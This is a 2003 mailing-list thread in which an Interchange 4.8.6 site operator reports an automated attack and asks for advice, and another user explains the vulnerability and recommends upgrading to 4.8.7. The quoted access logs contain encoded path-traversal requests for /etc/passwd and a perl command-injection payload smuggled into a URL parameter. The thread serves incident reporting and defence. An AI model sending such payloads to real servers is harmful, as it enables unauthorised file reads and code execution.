[ic] Hack attempt on IC 4.8.6

[Ryan Grace]

On Sat, 15 Nov 2003, Ed LaFrance wrote:

> At 10:35 PM 11/14/2003 -0800, you wrote:
> > >From what I can tell this person was unsuccessful.  My IC and Apache
> > logs show multiple attempts to grab my passwd file by inserting many
> > ../../../../../'s in the URLs and attempts to execute arbitrary perl code
> > by manipulating URL parameters.  Here are a few lines:
> >
> >66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET
> >/hya/index.html?id=%2e%2e%2f%
> >2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
> >%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
> >f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 403 109 "-" "Mozilla/4.0 (compatible;
> >MSIE 4
> >.0; Windows 95)"
> >66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET
> >/hya/index.html?id=foo%3bfoo%
> >7cperl%20%2de%20%27print%22roo%22%3bprint%22t%3a%22%27%26%26foo%00
> >HTTP/1.0" 403
> >  82 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
> >66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=
> >HTTP/1.0"
> >  200 8162 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
> >66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/index.html?id=
> >HTTP/1.0"
> >  200 8162 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
> >66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET
> >/hya/customerservice?mv_sessi
> >on_id=6MZFj58R&mv_pc=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2
> >e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%
> >2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&spg=customerservice
> >HTT
> >P/1.0" 302 39 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
> >66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET
> >/hya/customerservice?mv_sessi
> >on_id=6MZFj58R&mv_pc=1&spg=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
> >f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%
> >2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0"
> >302 39
> >"-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
> >66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET
> >/hya/customerservice?mv_sessi
> >on_id=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2
> >e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
> >2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&mv_pc=1&spg=customerservice
> >HTTP/1.0"
> >403 109 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
> >
> >Sorry for the weird wrapping.  The log goes on and on like this.
> >
> >Has anyone else seen this kind of attempt?  It looks like a script judging
> >by the rapidity of the accesses.
> >
> >Ryan
>
> I just grep'd the logs on a couple of servers for matching substrings and
> came up empty. I get the impression that this attempt was targeted
> specifically at interchange. There was a vulnerability in the 4.8 branch
> which could allow arbitrary file reads with a technique like this, but it
> was fixed, so if you are running 4.8.7 or higher you should be ok. If you
> are running an earlier version, I strongly recommend an upgrade.
>
> - Ed
>

Thanks for the reply, Ed.  I've greped out the lines matching the source IP from my access_log and can make that file available to anyone who wants to check it out.

I'll be upgrading soon, then.  I'm currently running 4.8.6.

Thanks,

Ryan